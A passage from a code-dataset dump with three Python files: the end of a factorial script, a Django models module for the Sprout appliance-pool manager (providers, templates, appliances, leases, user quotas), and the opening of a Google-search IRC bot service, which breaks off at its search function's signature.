- '))\n#\n# cash = round(number / usd, 2)\n# print('You receive', cash, ' of cash')\n\n\nprint('Let\\'s find factorial')\nnumber = int(input('Give me a number: '))\n\ni = 2\nfactorial = 1\nwhile i <= number:\n factorial *= i\n i += 1\nprint('Hey bro your factorial is: ', factorial)","sub_path":"NewOne/Hey.py","file_name":"Hey.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"300146739","text":"# -*- coding: utf-8 -*-\nimport yaml\n\nfrom celery import chain\nfrom contextlib import contextmanager\nfrom datetime import timedelta, date\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models, transaction\nfrom django.utils import timezone\n\nfrom sprout import critical_section\nfrom sprout.log import create_logger\n\nfrom utils import mgmt_system\nfrom utils.appliance import Appliance as CFMEAppliance, IPAppliance\nfrom utils.conf import cfme_data\nfrom utils.providers import get_mgmt\nfrom utils.timeutil import nice_seconds\nfrom utils.version import Version\n\n\n# Monkey patch the User object in order to have nicer checks\ndef has_quotas(self):\n try:\n self.quotas\n except ObjectDoesNotExist:\n return False\n else:\n return True\n\nUser.has_quotas = property(has_quotas)\n\n\ndef apply_if_not_none(o, meth, *args, **kwargs):\n if o is None:\n return None\n return getattr(o, meth)(*args, **kwargs)\n\n\nclass MetadataMixin(models.Model):\n class Meta:\n abstract = True\n object_meta_data = models.TextField(default=yaml.dump({}))\n\n def reload(self):\n new_self = self.__class__.objects.get(pk=self.pk)\n self.__dict__.update(new_self.__dict__)\n\n @property\n @contextmanager\n def metadata_lock(self):\n with critical_section(\"metadata-({})[{}]\".format(self.__class__.__name__, str(self.pk))):\n yield\n\n @property\n def metadata(self):\n return yaml.load(self.object_meta_data)\n\n @metadata.setter\n def metadata(self, value):\n if not isinstance(value, dict):\n raise TypeError(\"You can store only dict in metadata!\")\n self.object_meta_data = yaml.dump(value)\n\n @property\n @contextmanager\n def edit_metadata(self):\n with transaction.atomic():\n with self.metadata_lock:\n o = type(self).objects.get(pk=self.pk)\n metadata = o.metadata\n yield metadata\n o.metadata = metadata\n o.save()\n self.reload()\n\n @property\n def logger(self):\n return create_logger(self)\n\n @classmethod\n def class_logger(cls, id=None):\n return create_logger(cls, id)\n\n\nclass DelayedProvisionTask(MetadataMixin):\n pool = models.ForeignKey(\"AppliancePool\")\n lease_time = models.IntegerField(null=True, blank=True)\n provider_to_avoid = models.ForeignKey(\"Provider\", null=True, blank=True)\n\n def __unicode__(self):\n return u\"Task {}: Provision on {}, lease time {}, avoid provider {}\".format(\n self.id, self.pool.id, self.lease_time,\n self.provider_to_avoid.id if self.provider_to_avoid is not None else \"---\")\n\n\nclass Provider(MetadataMixin):\n id = models.CharField(max_length=32, primary_key=True, help_text=\"Provider's key in YAML.\")\n working = models.BooleanField(default=False, help_text=\"Whether provider is available.\")\n num_simultaneous_provisioning = models.IntegerField(default=5,\n help_text=\"How many simultaneous background provisioning tasks can run on this provider.\")\n num_simultaneous_configuring = models.IntegerField(default=1,\n help_text=\"How many simultaneous template configuring tasks can run on this 
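The `MetadataMixin` above round-trips a dict through the yaml-serialized `object_meta_data` column, guarded by a critical section; a usage sketch of its `edit_metadata` context manager (the provider id is made up, and this assumes a running Django context):

```python
# Illustrative use of MetadataMixin.edit_metadata as defined above:
# mutate the dict inside the block and it is re-serialized, saved
# atomically under the metadata lock, and the instance reloaded.
provider = Provider.objects.get(id="example-provider")  # hypothetical row
with provider.edit_metadata as metadata:
    metadata.setdefault("templates", []).append("cfme-template-1")
assert "cfme-template-1" in provider.metadata["templates"]
```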
provider.\")\n appliance_limit = models.IntegerField(\n null=True, help_text=\"Hard limit of how many appliances can run on this provider\")\n\n @property\n def api(self):\n return get_mgmt(self.id)\n\n @property\n def num_currently_provisioning(self):\n return len(\n Appliance.objects.filter(\n ready=False, marked_for_deletion=False, template__provider=self, ip_address=None))\n\n @property\n def num_templates_preparing(self):\n return len(Template.objects.filter(provider=self, ready=False))\n\n @property\n def remaining_configuring_slots(self):\n result = self.num_simultaneous_configuring - self.num_templates_preparing\n if result < 0:\n return 0\n return result\n\n @property\n def remaining_appliance_slots(self):\n if self.appliance_limit is None:\n return 1\n result = self.appliance_limit - self.num_currently_managing\n if result < 0:\n return 0\n return result\n\n @property\n def num_currently_managing(self):\n return len(Appliance.objects.filter(template__provider=self))\n\n @property\n def currently_managed_appliances(self):\n return Appliance.objects.filter(template__provider=self)\n\n @property\n def remaining_provisioning_slots(self):\n result = self.num_simultaneous_provisioning - self.num_currently_provisioning\n if result < 0:\n return 0\n # Take the appliance limit into account\n if self.appliance_limit is None:\n return result\n else:\n free_appl_slots = self.appliance_limit - self.num_currently_managing\n if free_appl_slots < 0:\n free_appl_slots = 0\n return min(free_appl_slots, result)\n\n @property\n def free(self):\n return self.remaining_provisioning_slots > 0\n\n @property\n def provisioning_load(self):\n if self.num_simultaneous_provisioning == 0:\n return 1.0 # prevent division by zero\n return float(self.num_currently_provisioning) / float(self.num_simultaneous_provisioning)\n\n @property\n def appliance_load(self):\n if self.appliance_limit is None or self.appliance_limit == 0:\n return 0.0\n return float(self.num_currently_managing) / float(self.appliance_limit)\n\n @property\n def load(self):\n \"\"\"Load for sorting\"\"\"\n if self.appliance_limit is None:\n return self.provisioning_load\n else:\n return self.appliance_load\n\n @classmethod\n def get_available_provider_keys(cls):\n return cfme_data.get(\"management_systems\", {}).keys()\n\n @property\n def provider_data(self):\n return cfme_data.get(\"management_systems\", {}).get(self.id, {})\n\n @property\n def ip_address(self):\n return self.provider_data.get(\"ipaddress\")\n\n @property\n def templates(self):\n return self.metadata.get(\"templates\", [])\n\n @templates.setter\n def templates(self, value):\n with self.edit_metadata as metadata:\n metadata[\"templates\"] = value\n\n @property\n def template_name_length(self):\n return self.metadata.get(\"template_name_length\", None)\n\n @template_name_length.setter\n def template_name_length(self, value):\n with self.edit_metadata as metadata:\n metadata[\"template_name_length\"] = value\n\n @property\n def appliances_manage_this_provider(self):\n return self.metadata.get(\"appliances_manage_this_provider\", [])\n\n @appliances_manage_this_provider.setter\n def appliances_manage_this_provider(self, value):\n with self.edit_metadata as metadata:\n metadata[\"appliances_manage_this_provider\"] = value\n\n @property\n def g_appliances_manage_this_provider(self):\n for appl_id in self.appliances_manage_this_provider:\n try:\n yield Appliance.objects.get(id=appl_id)\n except ObjectDoesNotExist:\n continue\n\n @property\n def user_usage(self):\n per_user_usage = 
{}\n for appliance in Appliance.objects.filter(template__provider=self):\n if appliance.owner is None:\n continue\n owner = appliance.owner.username\n if owner not in per_user_usage:\n per_user_usage[owner] = 1\n else:\n per_user_usage[owner] += 1\n per_user_usage = per_user_usage.items()\n per_user_usage.sort(key=lambda item: item[1], reverse=True)\n return per_user_usage\n\n @property\n def free_shepherd_appliances(self):\n return Appliance.objects.filter(\n template__provider=self, appliance_pool=None, marked_for_deletion=False, ready=True)\n\n @classmethod\n def complete_user_usage(cls):\n result = {}\n for provider in cls.objects.all():\n for username, count in provider.user_usage:\n if username not in result:\n result[username] = 0\n result[username] += count\n result = result.items()\n result.sort(key=lambda item: item[1], reverse=True)\n return result\n\n def cleanup(self):\n \"\"\"Put any cleanup tasks that might help the application stability here\"\"\"\n self.logger.info(\"Running cleanup on provider {}\".format(self.id))\n if isinstance(self.api, mgmt_system.OpenstackSystem):\n # Openstack cleanup\n # Clean up the floating IPs\n for floating_ip in self.api.api.floating_ips.findall(fixed_ip=None):\n self.logger.info(\n \"Cleaning up the {} floating ip {}\".format(self.id, floating_ip.ip))\n try:\n floating_ip.delete()\n except Exception as e:\n self.logger.exception(e)\n\n def vnc_console_link_for(self, appliance):\n if appliance.uuid is None:\n return None\n if isinstance(self.api, mgmt_system.OpenstackSystem):\n return \"http://{}/dashboard/project/instances/{}/?tab=instance_details__console\".format(\n self.ip_address, appliance.uuid\n )\n else:\n return None\n\n def __unicode__(self):\n return \"{} {}\".format(self.__class__.__name__, self.id)\n\n\nclass Group(MetadataMixin):\n id = models.CharField(max_length=32, primary_key=True,\n help_text=\"Group name as trackerbot says. (eg. upstream, downstream-53z, ...)\")\n template_pool_size = models.IntegerField(default=0,\n help_text=\"How many appliances to keep spinned for quick taking.\")\n unconfigured_template_pool_size = models.IntegerField(default=0,\n help_text=\"How many appliances to keep spinned for quick taking - unconfigured ones.\")\n template_obsolete_days = models.IntegerField(\n null=True, blank=True, help_text=\"Templates older than X days won't be loaded into sprout\")\n template_obsolete_days_delete = models.BooleanField(\n default=False,\n help_text=\"If template_obsolete_days set, this will enable deletion of obsolete templates\"\n \" using that metric. WARNING! Use with care. Best use for upstream templates.\")\n\n @property\n def obsolete_templates(self):\n \"\"\"Return a list of obsolete templates. 
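The per-owner tally built by `user_usage` above is a counting-and-sorting pattern that `collections.Counter` captures directly; a sketch of the equivalent logic (not a drop-in replacement for the property):

```python
from collections import Counter

def user_usage(provider):
    # count appliances per owner, skipping unowned appliances,
    # and return (username, count) pairs, most used first
    owners = (a.owner.username
              for a in Appliance.objects.filter(template__provider=provider)
              if a.owner is not None)
    return Counter(owners).most_common()
```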
Ignores the latest one even if it was obsolete by\n the means of days.\"\"\"\n if self.template_obsolete_days is None:\n return None\n latest_template_date = Template.objects.filter(\n exists=True, template_group=self).order_by(\"-date\")[0].date\n latest_template_ids = [\n tpl.id\n for tpl\n in Template.objects.filter(exists=True, template_group=self, date=latest_template_date)]\n return Template.objects.filter(\n exists=True, date__lt=date.today() - timedelta(days=self.template_obsolete_days),\n template_group=self).exclude(id__in=latest_template_ids).order_by(\"date\")\n\n @property\n def templates(self):\n return Template.objects.filter(template_group=self).order_by(\"-date\", \"provider__id\")\n\n @property\n def existing_templates(self):\n return self.templates.filter(exists=True)\n\n @property\n def appliances(self):\n return Appliance.objects.filter(template__template_group=self)\n\n def shepherd_appliances(self, preconfigured=True):\n return self.appliances.filter(\n appliance_pool=None, ready=True, marked_for_deletion=False,\n template__preconfigured=preconfigured)\n\n @property\n def configured_shepherd_appliances(self):\n return self.shepherd_appliances(True)\n\n @property\n def unconfigured_shepherd_appliances(self):\n return self.shepherd_appliances(False)\n\n def get_fulfillment_percentage(self, preconfigured):\n \"\"\"Return percentage of fulfillment of the group shepherd.\n\n Values between 0-100, can be over 100 if there are more than required.\n\n Args:\n preconfigured: Whether to check the pure ones or configured ones.\n \"\"\"\n appliances_in_shepherd = len(\n self.appliances.filter(\n template__preconfigured=preconfigured, appliance_pool=None,\n marked_for_deletion=False))\n wanted_pool_size = (\n self.template_pool_size if preconfigured else self.unconfigured_template_pool_size)\n if wanted_pool_size == 0:\n return 100\n return int(round((float(appliances_in_shepherd) / float(wanted_pool_size)) * 100.0))\n\n def __unicode__(self):\n return \"{} {} (pool size={}/{})\".format(\n self.__class__.__name__, self.id, self.template_pool_size,\n self.unconfigured_template_pool_size)\n\n\nclass Template(MetadataMixin):\n provider = models.ForeignKey(Provider, help_text=\"Where does this template reside\")\n template_group = models.ForeignKey(Group, help_text=\"Which group the template belongs to.\")\n version = models.CharField(max_length=16, null=True, help_text=\"Downstream version.\")\n date = models.DateField(help_text=\"Template build date (original).\")\n\n original_name = models.CharField(max_length=64, help_text=\"Template's original name.\")\n name = models.CharField(max_length=64, help_text=\"Template's name as it resides on provider.\")\n\n status = models.TextField(default=\"Template inserted into the system\")\n status_changed = models.DateTimeField(auto_now_add=True)\n ready = models.BooleanField(default=False, help_text=\"Template is ready-to-be-used\")\n exists = models.BooleanField(default=True, help_text=\"Template exists in the provider.\")\n usable = models.BooleanField(default=False, help_text=\"Template is marked as usable\")\n\n preconfigured = models.BooleanField(default=True, help_text=\"Is prepared for immediate use?\")\n\n @property\n def provider_api(self):\n return self.provider.api\n\n @property\n def provider_name(self):\n return self.provider.id\n\n @property\n def exists_in_provider(self):\n return self.name in self.provider_api.list_template()\n\n def set_status(self, status):\n with transaction.atomic():\n template = 
Template.objects.get(id=self.id)\n template.status = status\n template.status_changed = timezone.now()\n template.save()\n self.logger.info(\"{}: {}\".format(self.pk, status))\n\n @property\n def cfme(self):\n return CFMEAppliance(self.provider_name, self.name)\n\n @property\n def can_be_deleted(self):\n return self.exists and self.preconfigured and len(self.appliances) == 0\n\n @property\n def appliances(self):\n return Appliance.objects.filter(template=self)\n\n @property\n def temporary_name(self):\n return self.metadata.get(\"temporary_name\", None)\n\n @temporary_name.setter\n def temporary_name(self, name):\n with self.edit_metadata as metadata:\n metadata[\"temporary_name\"] = name\n\n @temporary_name.deleter\n def temporary_name(self):\n with self.edit_metadata as metadata:\n if \"temporary_name\" in metadata:\n del metadata[\"temporary_name\"]\n\n @classmethod\n def get_versions(cls, **filters):\n versions = []\n for version in cls.objects.filter(**filters).values('version').distinct():\n v = version.values()[0]\n if v is not None:\n versions.append(v)\n versions.sort(key=Version, reverse=True)\n return versions\n\n @classmethod\n def get_dates(cls, **filters):\n dates = map(\n lambda d: d.values()[0],\n cls.objects.filter(**filters).values('date').distinct())\n dates.sort(reverse=True)\n return dates\n\n def __unicode__(self):\n return \"{} {}:{} @ {}\".format(\n self.__class__.__name__, self.version, self.name, self.provider.id)\n\n\nclass Appliance(MetadataMixin):\n class Power(object):\n ON = \"on\"\n OFF = \"off\"\n SUSPENDED = \"suspended\"\n REBOOTING = \"rebooting\"\n LOCKED = \"locked\"\n UNKNOWN = \"unknown\"\n ORPHANED = \"orphaned\"\n\n POWER_STATES_MAPPING = {\n # vSphere\n \"poweredOn\": Power.ON,\n \"poweredOff\": Power.OFF,\n \"suspended\": Power.SUSPENDED,\n # RHEV\n \"up\": Power.ON,\n \"down\": Power.OFF,\n \"suspended\": Power.SUSPENDED,\n \"image_locked\": Power.LOCKED,\n # Openstack\n \"ACTIVE\": Power.ON,\n \"SHUTOFF\": Power.OFF,\n \"SUSPENDED\": Power.SUSPENDED,\n # SCVMM\n \"Running\": Power.ON,\n \"PoweredOff\": Power.OFF,\n \"Stopped\": Power.OFF,\n \"Paused\": Power.SUSPENDED,\n # EC2 (for VM manager)\n \"stopped\": Power.OFF,\n \"running\": Power.ON,\n }\n template = models.ForeignKey(Template, help_text=\"Appliance's source template.\")\n appliance_pool = models.ForeignKey(\"AppliancePool\", null=True,\n help_text=\"Which appliance pool this appliance belongs to.\")\n name = models.CharField(max_length=64, help_text=\"Appliance's name as it is in the provider.\")\n ip_address = models.CharField(max_length=45, null=True, help_text=\"Appliance's IP address\")\n\n datetime_leased = models.DateTimeField(null=True, help_text=\"When the appliance was leased\")\n leased_until = models.DateTimeField(null=True, help_text=\"When does the appliance lease expire\")\n\n status = models.TextField(default=\"Appliance inserted into the system.\")\n status_changed = models.DateTimeField(auto_now_add=True)\n power_state_changed = models.DateTimeField(default=timezone.now)\n\n marked_for_deletion = models.BooleanField(default=False,\n help_text=\"Appliance is already being deleted.\")\n\n power_state = models.CharField(max_length=32, default=\"unknown\",\n help_text=\"Appliance's power state\")\n ready = models.BooleanField(default=False,\n help_text=\"Appliance has an IP address and web UI is online.\")\n uuid = models.CharField(max_length=36, null=True, blank=True, help_text=\"UUID of the machine\")\n description = models.TextField(blank=True)\n lun_disk_connected = 
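`get_versions` above sorts with `utils.version.Version` as the key so that version strings order numerically rather than lexically; a small illustration of why the key matters (the version values are invented, and this assumes `Version` compares component-wise as its use above implies):

```python
from utils.version import Version  # same comparator the model imports

versions = ["5.4.0.2", "5.10.0.1", "5.4.1.0"]
print(sorted(versions, key=Version, reverse=True))
# ['5.10.0.1', '5.4.1.0', '5.4.0.2'] -- a plain string sort would put
# '5.4...' ahead of '5.10...' because '4' > '1' lexically
```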
models.BooleanField(\n default=False,\n help_text=\"Whether the Direct LUN disk is connected. (RHEV Only)\")\n\n @property\n def serialized(self):\n return dict(\n id=self.id,\n ready=self.ready,\n name=self.name,\n ip_address=self.ip_address,\n status=self.status,\n power_state=self.power_state,\n status_changed=apply_if_not_none(self.status_changed, \"isoformat\"),\n datetime_leased=apply_if_not_none(self.datetime_leased, \"isoformat\"),\n leased_until=apply_if_not_none(self.leased_until, \"isoformat\"),\n template_name=self.template.original_name,\n template_id=self.template.id,\n provider=self.template.provider.id,\n marked_for_deletion=self.marked_for_deletion,\n uuid=self.uuid,\n template_version=self.template.version,\n template_build_date=self.template.date.isoformat(),\n template_group=self.template.template_group.id,\n template_sprout_name=self.template.name,\n preconfigured=self.preconfigured,\n lun_disk_connected=self.lun_disk_connected,\n )\n\n @property\n @contextmanager\n def kill_lock(self):\n with critical_section(\"kill-({})[{}]\".format(self.__class__.__name__, str(self.pk))):\n yield\n\n @property\n def provider_api(self):\n return self.template.provider_api\n\n @property\n def provider_name(self):\n return self.template.provider_name\n\n @property\n def provider(self):\n return self.template.provider\n\n @property\n def preconfigured(self):\n return self.template.preconfigured\n\n @property\n def cfme(self):\n return CFMEAppliance(self.provider_name, self.name)\n\n @property\n def ipapp(self):\n return IPAppliance(self.ip_address)\n\n def set_status(self, status):\n with transaction.atomic():\n appliance = Appliance.objects.get(id=self.id)\n if status != appliance.status:\n appliance.status = status\n appliance.status_changed = timezone.now()\n appliance.save()\n self.logger.info(\"Status changed: {}\".format(status))\n\n def set_power_state(self, power_state):\n if power_state != self.power_state:\n self.logger.info(\"Changed power state to {}\".format(power_state))\n self.power_state = power_state\n self.power_state_changed = timezone.now()\n\n def __unicode__(self):\n return \"{} {} @ {}\".format(self.__class__.__name__, self.name, self.template.provider.id)\n\n @classmethod\n def unassigned(cls):\n return cls.objects.filter(appliance_pool=None, ready=True)\n\n @classmethod\n def give_to_pool(cls, pool, custom_limit=None):\n \"\"\"Give appliances from shepherd to the pool where the maximum count is specified by pool\n or you can specify a custom limit\n \"\"\"\n from appliances.tasks import (\n appliance_power_on, mark_appliance_ready, wait_appliance_ready, appliance_yum_update,\n appliance_reboot)\n limit = custom_limit if custom_limit is not None else pool.total_count\n appliances = []\n with transaction.atomic():\n for template in pool.possible_templates:\n for appliance in cls.unassigned().filter(\n template=template).all()[:limit - len(appliances)]:\n with appliance.kill_lock:\n appliance.appliance_pool = pool\n appliance.save()\n appliance.set_status(\"Given to pool {}\".format(pool.id))\n tasks = [appliance_power_on.si(appliance.id)]\n if pool.yum_update:\n tasks.append(appliance_yum_update.si(appliance.id))\n tasks.append(\n appliance_reboot.si(appliance.id, if_needs_restarting=True))\n if appliance.preconfigured:\n tasks.append(wait_appliance_ready.si(appliance.id))\n else:\n tasks.append(mark_appliance_ready.si(appliance.id))\n chain(*tasks)()\n appliances.append(appliance)\n if len(appliances) == limit:\n break\n return len(appliances)\n\n @classmethod\n 
def kill(cls, appliance_or_id):\n # Completely delete appliance from provider\n from appliances.tasks import kill_appliance\n if isinstance(appliance_or_id, cls):\n self = Appliance.objects.get(id=appliance_or_id.id)\n else:\n self = Appliance.objects.get(id=appliance_or_id)\n with self.kill_lock:\n with transaction.atomic():\n self = type(self).objects.get(pk=self.pk)\n self.class_logger(self.pk).info(\"Killing\")\n if not self.marked_for_deletion:\n self.marked_for_deletion = True\n self.leased_until = None\n self.save()\n return kill_appliance.delay(self.id)\n\n def delete(self, *args, **kwargs):\n # Intercept delete and lessen the number of appliances in the pool\n # Then if the appliance is still present in the management system, kill it\n self.logger.info(\"Deleting from database\")\n pool = self.appliance_pool\n # pop the custom kwarg before it reaches Django's delete(), which\n # does not accept it\n do_not_touch = kwargs.pop(\"do_not_touch_ap\", False)\n result = super(Appliance, self).delete(*args, **kwargs)\n if pool is not None and not do_not_touch:\n if pool.current_count == 0:\n pool.delete()\n return result\n\n def prolong_lease(self, time=60):\n self.logger.info(\"Prolonging lease by {} minutes from now.\".format(time))\n with transaction.atomic():\n appliance = Appliance.objects.get(id=self.id)\n appliance.leased_until = timezone.now() + timedelta(minutes=time)\n appliance.save()\n\n @property\n def owner(self):\n if self.appliance_pool is None:\n return None\n else:\n return self.appliance_pool.owner\n\n @property\n def expires_in(self):\n \"\"\"Minutes\"\"\"\n if self.leased_until is None:\n return \"never\"\n seconds = (self.leased_until - timezone.now()).total_seconds()\n if seconds <= 0.0:\n return \"Expired!\"\n else:\n return nice_seconds(seconds)\n\n @property\n def can_launch(self):\n return self.power_state in {self.Power.OFF, self.Power.SUSPENDED}\n\n @property\n def can_suspend(self):\n return self.power_state in {self.Power.ON}\n\n @property\n def can_stop(self):\n return self.power_state in {self.Power.ON}\n\n @property\n def version(self):\n if self.template.version is None:\n return \"---\"\n else:\n return self.template.version\n\n @property\n def managed_providers(self):\n return self.metadata.get(\"managed_providers\", [])\n\n @managed_providers.setter\n def managed_providers(self, value):\n with self.edit_metadata as metadata:\n metadata[\"managed_providers\"] = value\n\n @property\n def vnc_link(self):\n try:\n return self.provider.vnc_console_link_for(self)\n except KeyError: # provider does not exist any more\n return None\n\n\nclass AppliancePool(MetadataMixin):\n total_count = models.IntegerField(help_text=\"How many appliances should be in this pool.\")\n group = models.ForeignKey(Group, help_text=\"Group which is used to provision appliances.\")\n provider = models.ForeignKey(\n Provider, help_text=\"If requested, appliances can be on single provider.\", null=True,\n blank=True)\n version = models.CharField(max_length=16, null=True, help_text=\"Appliance version\")\n date = models.DateField(null=True, help_text=\"Appliance date.\")\n owner = models.ForeignKey(User, help_text=\"User who owns the appliance pool\")\n\n preconfigured = models.BooleanField(\n default=True, help_text=\"Whether to provision preconfigured appliances\")\n description = models.TextField(blank=True)\n not_needed_anymore = models.BooleanField(\n default=False, help_text=\"Used for marking the appliance pool as being deleted\")\n finished = models.BooleanField(default=False, help_text=\"Whether fulfillment has been met.\")\n yum_update = 
models.BooleanField(default=False, help_text=\"Whether to update appliances.\")\n\n @classmethod\n def create(cls, owner, group, version=None, date=None, provider=None, num_appliances=1,\n time_leased=60, preconfigured=True, yum_update=False):\n if owner.has_quotas:\n user_pools_count = cls.objects.filter(owner=owner).count()\n user_vms_count = Appliance.objects.filter(appliance_pool__owner=owner).count()\n if owner.quotas.total_pool_quota is not None:\n if owner.quotas.total_pool_quota <= user_pools_count:\n raise ValueError(\n \"User has too many pools ({} allowed, {} already existing)\".format(\n owner.quotas.total_pool_quota, user_pools_count))\n if owner.quotas.total_vm_quota is not None:\n if owner.quotas.total_vm_quota <= (user_vms_count + num_appliances):\n raise ValueError(\n \"Requested {} appliances, limit is {} and currently user has {}\".format(\n num_appliances, owner.quotas.total_vm_quota, user_vms_count))\n if owner.quotas.per_pool_quota is not None:\n if num_appliances > owner.quotas.per_pool_quota:\n raise ValueError(\"You are limited to {} VMs per pool, requested {}\".format(\n owner.quotas.per_pool_quota, num_appliances))\n from appliances.tasks import request_appliance_pool\n # Retrieve latest possible\n if not version:\n versions = Template.get_versions(\n template_group=group, ready=True, usable=True, preconfigured=preconfigured,\n provider__working=True)\n if versions:\n version = versions[0]\n if not date:\n if version is not None:\n dates = Template.get_dates(template_group=group, version=version, ready=True,\n usable=True, preconfigured=preconfigured, provider__working=True)\n else:\n dates = Template.get_dates(\n template_group=group, ready=True, usable=True, preconfigured=preconfigured,\n provider__working=True)\n if dates:\n date = dates[0]\n if isinstance(group, basestring):\n group = Group.objects.get(id=group)\n if isinstance(provider, basestring):\n provider = Provider.objects.get(id=provider, working=True)\n if not (version or date):\n raise Exception(\n \"Could not find proper combination of group, date, version and a working provider!\")\n req = cls(\n group=group, version=version, date=date, total_count=num_appliances, owner=owner,\n provider=provider, preconfigured=preconfigured, yum_update=yum_update)\n if not req.possible_templates:\n raise Exception(\"No possible templates! 
(query: {}\".format(str(req.__dict__)))\n req.save()\n cls.class_logger(req.pk).info(\"Created\")\n request_appliance_pool.delay(req.id, time_leased)\n return req\n\n def delete(self, *args, **kwargs):\n self.logger.info(\"Deleting\")\n with transaction.atomic():\n for task in DelayedProvisionTask.objects.filter(pool=self):\n task.delete()\n\n return super(AppliancePool, self).delete(*args, **kwargs)\n\n @property\n def filter_params(self):\n filter_params = {\n \"template_group\": self.group,\n \"preconfigured\": self.preconfigured,\n }\n if self.version is not None:\n filter_params[\"version\"] = self.version\n if self.date is not None:\n filter_params[\"date\"] = self.date\n if self.provider is not None:\n filter_params[\"provider\"] = self.provider\n return filter_params\n\n @property\n def appliance_filter_params(self):\n params = self.filter_params\n result = {}\n for key, value in params.iteritems():\n result[\"template__{}\".format(key)] = value\n return result\n\n @property\n def possible_templates(self):\n return Template.objects.filter(\n ready=True, exists=True, usable=True,\n **self.filter_params).all()\n\n @property\n def possible_provisioning_templates(self):\n return sorted(\n filter(lambda tpl: tpl.provider.free, self.possible_templates),\n # Sort by date and load to pick the best match (least loaded provider)\n key=lambda tpl: (tpl.date, 1.0 - tpl.provider.appliance_load), reverse=True)\n\n @property\n def possible_providers(self):\n \"\"\"Which providers contain a template that could be used for provisioning?.\"\"\"\n return set(tpl.provider for tpl in self.possible_templates)\n\n @property\n def appliances(self):\n return Appliance.objects.filter(appliance_pool=self).order_by(\"id\").all()\n\n @property\n def current_count(self):\n return len(self.appliances)\n\n @property\n def percent_finished(self):\n if self.total_count is None:\n return 0.0\n total = 4 * self.total_count\n if total == 0:\n return 1.0\n finished = 0\n for appliance in self.appliances:\n if appliance.power_state not in {Appliance.Power.UNKNOWN, Appliance.Power.ORPHANED}:\n finished += 1\n if appliance.power_state == Appliance.Power.ON:\n finished += 1\n if appliance.ip_address is not None:\n finished += 1\n if appliance.ready:\n finished += 1\n return float(finished) / float(total)\n\n @property\n def appliance_ips(self):\n return [ap.ip_address for ap in filter(lambda a: a.ip_address is not None, self.appliances)]\n\n @property\n def fulfilled(self):\n try:\n return len(self.appliance_ips) == self.total_count\\\n and all(a.ready for a in self.appliances)\n except ObjectDoesNotExist:\n return False\n\n @property\n def queued_provision_tasks(self):\n return DelayedProvisionTask.objects.filter(pool=self).order_by(\"id\")\n\n def prolong_lease(self, time=60):\n self.logger.info(\"Initiated lease prolonging by {} minutes\".format(time))\n for appliance in self.appliances:\n appliance.prolong_lease(time=time)\n\n def kill(self):\n with transaction.atomic():\n p = type(self).objects.get(pk=self.pk)\n p.not_needed_anymore = True\n p.save()\n save_lives = not self.finished\n self.logger.info(\"Killing\")\n if self.appliances:\n for appliance in self.appliances:\n if (\n save_lives and appliance.ready and appliance.leased_until is None\n and appliance.marked_for_deletion is False\n and not appliance.managed_providers):\n with transaction.atomic():\n with appliance.kill_lock:\n appliance.appliance_pool = None\n appliance.datetime_leased = None\n appliance.save()\n self.total_count -= 1\n if self.total_count < 
0:\n self.total_count = 0 # Protection against stupidity\n self.save()\n appliance.set_status(\n \"The appliance was taken out of dying pool {}\".format(self.id))\n else:\n Appliance.kill(appliance)\n\n if self.current_count == 0:\n # Pool is empty, no point of keeping it alive.\n # This is needed when deleting a pool that has appliances that can be salvaged.\n # They are not deleted. the .delete() method on appliances takes care that when the\n # last appliance in pool is deleted, it deletes the pool. But since we don't delete\n # in the case of salvaging them, we do have to do it manually here.\n self.delete()\n else:\n # No appliances, so just delete it\n self.delete()\n\n @property\n def possible_other_owners(self):\n \"\"\"Returns a list of User objects that can own this pool instead of original owner\"\"\"\n return type(self.owner).objects.exclude(pk=self.owner.pk).order_by(\"last_name\",\n \"first_name\")\n\n @property\n def num_delayed_provisioning_tasks(self):\n return len(self.queued_provision_tasks)\n\n @property\n def num_provisioning_tasks_before(self):\n tasks = self.queued_provision_tasks\n if len(tasks) == 0:\n return 0\n latest_id = tasks[0].id\n return len(DelayedProvisionTask.objects.filter(id__lt=latest_id))\n\n @property\n def num_possible_provisioning_slots(self):\n providers = set([])\n for template in self.possible_provisioning_templates:\n providers.add(template.provider)\n slots = 0\n for provider in providers:\n slots += provider.remaining_provisioning_slots\n return slots\n\n @property\n def num_possible_appliance_slots(self):\n providers = set([])\n for template in self.possible_templates:\n providers.add(template.provider)\n slots = 0\n for provider in providers:\n slots += provider.remaining_appliance_slots\n return slots\n\n @property\n def num_shepherd_appliances(self):\n return len(Appliance.objects.filter(appliance_pool=None, **self.appliance_filter_params))\n\n def __repr__(self):\n return \"<AppliancePool id: {}, group: {}, total_count: {}>\".format(\n self.id, self.group.id, self.total_count)\n\n def __unicode__(self):\n return \"AppliancePool id: {}, group: {}, total_count: {}\".format(\n self.id, self.group.id, self.total_count)\n\n\nclass MismatchVersionMailer(models.Model):\n provider = models.ForeignKey(Provider)\n template_name = models.CharField(max_length=64)\n supposed_version = models.CharField(max_length=32)\n actual_version = models.CharField(max_length=32)\n sent = models.BooleanField(default=False)\n\n\nclass UserApplianceQuota(models.Model):\n user = models.OneToOneField(User, related_name=\"quotas\")\n per_pool_quota = models.IntegerField(null=True, blank=True)\n total_pool_quota = models.IntegerField(null=True, blank=True)\n total_vm_quota = models.IntegerField(null=True, blank=True)\n","sub_path":"sprout/appliances/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":37456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"207253645","text":"\"\"\"\nGoogle web search.\n\nRun queries on Google and return results.\n\"\"\"\n\nimport requests\n\nfrom kochira import config\nfrom kochira.service import Service, background, Config, coroutine\nfrom kochira.userdata import UserData\n\nservice = Service(__name__, __doc__)\n\n\n@service.config\nclass Config(Config):\n api_key = config.Field(doc=\"Google API key.\")\n cx = config.Field(doc=\"Custom search engine ID.\")\n\n\n@service.command(r\"!g (?P<term>.+?)$\")\n@service.command(r\"(?:search for|google) (?P<term>.+?)\\??$\", mention=True)\n@background\ndef search(ctx, term):\n 
